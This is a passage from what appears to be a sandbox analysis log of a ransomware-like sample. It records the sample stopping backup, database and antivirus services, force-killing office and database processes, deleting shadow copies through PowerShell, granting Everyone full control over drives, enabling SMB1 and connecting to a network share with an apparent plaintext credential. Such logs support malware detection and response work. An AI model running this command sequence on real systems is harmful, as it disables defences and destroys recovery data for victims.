C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVAdminService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sacsvr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop WRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKey /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop tmlisten /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TmCCSF /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL57 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McShield /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McTaskManager /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update_64 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_filter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophossps /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SntpService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SmcService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Smcinst /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ShMonitor /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SepMasterService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DCAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AVP /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Antivirus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c net view2⤵
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.33 /USER:2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.33 /USER:ragulin Steel_Rat_20202⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp141D.bat2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
